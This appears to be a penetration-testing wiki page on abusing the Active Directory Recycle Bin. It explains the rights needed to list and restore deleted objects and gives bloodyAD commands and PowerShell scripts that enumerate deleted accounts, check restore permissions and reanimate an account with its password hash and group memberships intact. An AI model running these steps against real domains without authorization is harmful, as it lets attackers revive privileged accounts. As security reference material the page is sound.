Active Directory - Recycle Bin
Details
- Deleted objects are kept for 180 days by default (msDS-DeletedObjectLifetime, which falls back to tombstoneLifetime when it is not set); once that lifetime expires they become recycled objects and can no longer be restored
- Deleted objects themselves sit in the hidden Deleted Objects container of each partition, e.g. CN=Deleted Objects,DC=example,DC=com
- The Recycle Bin optional feature object is stored in the Configuration partition under:
CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=example,DC=com
Enable Active Directory Recycle Bin in PowerShell (requires the Windows Server 2008 R2 forest functional level or higher and Enterprise Admins; once enabled, the feature cannot be disabled)
Enable-ADOptionalFeature -Identity 'CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=contoso,DC=com' -Scope ForestOrConfigurationSet -Target 'contoso.com'
Deleted Objects
Requirements:
- LIST_CHILD right on the Deleted Objects container
- LDAP control OID 1.2.840.113556.1.4.2064 (LDAP_SERVER_SHOW_RECYCLED_OID): shows deleted, tombstoned, and recycled objects (the older show-deleted control, 1.2.840.113556.1.4.417, leaves recycled objects hidden)
Exploitation:
- List rights: check all rights from the requirements
- List deleted objects with bloodyAD
- List deleted objects with PowerShell
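The listing step above, as an added example that is not part of the original page: it checks who holds LIST_CHILD on the Deleted Objects container and then enumerates every object flagged isDeleted with the RSAT ActiveDirectory module. It assumes the module is installed and that the session runs as a user allowed to read the container; the domain DN is resolved at run time and the attribute set chosen here is an assumption.

```powershell
# Added example, not from the original page: enumerate deleted/recycled objects
# and check the LIST_CHILD right on the Deleted Objects container.
# Assumes the RSAT ActiveDirectory module and a session that may read the container.
Import-Module ActiveDirectory

$domainDN  = (Get-ADDomain).DistinguishedName          # e.g. DC=domain,DC=local
$deletedDN = "CN=Deleted Objects,$domainDN"

# 1. Who may list the container? Only Allow ACEs granting ListChildren (or a
#    right that implies it) matter; by default that is SYSTEM and Administrators.
#    The container is itself flagged isDeleted, so it is only readable with the
#    show-deleted control that -IncludeDeletedObjects makes the cmdlet send.
$sd = (Get-ADObject -Identity $deletedDN -IncludeDeletedObjects -Properties nTSecurityDescriptor).nTSecurityDescriptor
$sd.Access |
    Where-Object { $_.AccessControlType -eq 'Allow' -and
                   $_.ActiveDirectoryRights -match 'ListChildren|GenericRead|GenericAll' } |
    Select-Object IdentityReference, ActiveDirectoryRights |
    Format-Table -AutoSize

# 2. List every object flagged isDeleted below the container, skipping the
#    container itself. lastKnownParent tells you where it lived, objectSid and
#    sAMAccountName survive even on a plain tombstone, isRecycled=TRUE marks
#    objects past msDS-DeletedObjectLifetime (visible only if the control sent
#    includes recycled objects, as 1.2.840.113556.1.4.2064 does).
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects -SearchBase $deletedDN `
             -Properties sAMAccountName, objectSid, lastKnownParent, whenChanged, isRecycled, 'msDS-LastKnownRDN' |
    Where-Object { $_.DistinguishedName -ne $deletedDN } |
    Select-Object @{n='Name';  e={ $_.'msDS-LastKnownRDN' }},
                  ObjectClass, sAMAccountName, objectSid, lastKnownParent, whenChanged,
                  @{n='State'; e={ if ($_.isRecycled) { 'recycled' } else { 'deleted' } }} |
    Sort-Object whenChanged -Descending |
    Format-Table -AutoSize
```

The bloodyAD equivalent is the `get search -c 1.2.840.113556.1.4.2064` form shown under Restore Objects below, with the filter relaxed to `'(isDeleted=TRUE)'` and `--attr sAMAccountName,objectSid,lastKnownParent` instead of the security descriptor. Objects reported as recycled are past their lifetime and are not candidates for the restore step.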
Restore Objects
Requirements:
- "Restore Tombstoned" (the Reanimate-Tombstones control access right) on the domain object
- Generic Write right on the deleted object
- Create Child right on the OU used for restoration
By default, only Domain Admins are able to list and restore deleted objects.
Which attributes survive deletion depends on the object's state:
- Deleted objects (Recycle Bin enabled) retain all their attributes, including sensitive ones such as group memberships and the password hash, so a restored account comes back fully usable
- Tombstoned objects (Recycle Bin disabled) retain only a handful of attributes, such as objectGUID, objectSid and sAMAccountName; everything else has to be repopulated after reanimation
- Recycled objects (deleted objects past msDS-DeletedObjectLifetime) cannot be restored at all
Exploitation:
- Check restore rights, one command per requirement:
Restore Tombstoned on the domain object:
bloodyAD --host 10.10.10.10 -d domain -u user -p 'Password123!' get object 'DC=domain,DC=local' --attr ntsecuritydescriptor --resolve-sd
Generic Write on the deleted object (the 1.2.840.113556.1.4.2064 control is needed to read it):
bloodyAD -u user -d domain -p 'Password123!' --host 10.10.10.10 get search -c 1.2.840.113556.1.4.2064 --filter '(&(isDeleted=TRUE)(sAMAccountName=deleted-computer$))' --attr ntsecuritydescriptor --resolve-sd
Create Child on the OU used for restoration:
bloodyAD --host 10.10.10.10 -d domain -u user -p 'Password123!' get object 'CN=Users,DC=domain,DC=local' --attr ntsecuritydescriptor --resolve-sd
- Restore the object using its sAMAccountName or objectSid
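The restore procedure above, as an added example that is not part of the original page: it resolves the deleted object from a sAMAccountName or objectSid, checks the three required rights by reading nTSecurityDescriptor (the same data the bloodyAD `--attr ntsecuritydescriptor` commands return), and restores the object with Restore-ADObject. It assumes the RSAT ActiveDirectory module; the target name `deleted-computer$`, the destination container and the `Show-Grants` helper are placeholders chosen for this example.

```powershell
# Added example, not from the original page: verify restore rights and restore
# a deleted object with the RSAT ActiveDirectory module. Target name and
# destination container are placeholders.
Import-Module ActiveDirectory

$target    = 'deleted-computer$'                 # sAMAccountName, or an objectSid such as S-1-5-21-...-1105
$domainDN  = (Get-ADDomain).DistinguishedName    # e.g. DC=domain,DC=local
$restoreOU = "CN=Computers,$domainDN"            # container that receives the restored object

# GUID of the Reanimate-Tombstones control access right ("Restore Tombstoned")
$reanimateTombstones = [guid]'45ec5156-db7e-47bb-b53f-dbeb2d03c40f'

# Locate the deleted object by sAMAccountName or objectSid. The Deleted Objects
# container is only searchable with the show-deleted control, hence -IncludeDeletedObjects.
$filter = if ($target -match '^S-1-') { "objectSid -eq '$target'" } else { "sAMAccountName -eq '$target'" }
$obj = Get-ADObject -IncludeDeletedObjects -SearchBase "CN=Deleted Objects,$domainDN" -Filter $filter `
        -Properties lastKnownParent, objectSid, isRecycled, 'msDS-LastKnownRDN'
if (-not $obj)       { throw "no deleted object matching $target" }
if ($obj.isRecycled) { throw "$target is already recycled and cannot be restored" }

# Print the Allow ACEs on an object that grant the wanted right. GenericAll
# always qualifies; for extended rights an empty ObjectType means "all of them".
function Show-Grants($dn, [string]$rightsPattern, [guid]$extendedRight = [guid]::Empty) {
    $sd = (Get-ADObject -Identity $dn -IncludeDeletedObjects -Properties nTSecurityDescriptor).nTSecurityDescriptor
    $sd.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and (
            $_.ActiveDirectoryRights -match 'GenericAll' -or
            ($_.ActiveDirectoryRights -match $rightsPattern -and
             ($extendedRight -eq [guid]::Empty -or $_.ObjectType -in @($extendedRight, [guid]::Empty))))
    } | Select-Object @{n='Object'; e={ $dn }}, IdentityReference, ActiveDirectoryRights, ObjectType
}

# 1. Reanimate-Tombstones on the domain object
Show-Grants $domainDN 'ExtendedRight' $reanimateTombstones
# 2. Generic Write on the deleted object itself
Show-Grants $obj.DistinguishedName 'GenericWrite|WriteProperty'
# 3. Create Child on the destination container
Show-Grants $restoreOU 'CreateChild'

# Restore. Restore-ADObject takes the DN or objectGUID of the deleted object;
# without -TargetPath it goes back under lastKnownParent, and -NewName is only
# needed when the original RDN (msDS-LastKnownRDN) now collides with a live object.
Write-Host "restoring $($obj.'msDS-LastKnownRDN') (last parent: $($obj.lastKnownParent)) into $restoreOU"
Restore-ADObject -Identity $obj.ObjectGUID -TargetPath $restoreOU

# Confirm the object is back with the attributes that matter to an attacker
Get-ADObject -Identity $obj.ObjectGUID -Properties objectSid, memberOf, userAccountControl
```

The three `Show-Grants` calls only list candidates; a missing match on any of them means the restore will fail with insufficient rights, and the last `Get-ADObject` shows whether the Recycle Bin preserved the linked attributes (memberOf) or whether only a tombstone's bare identity came back.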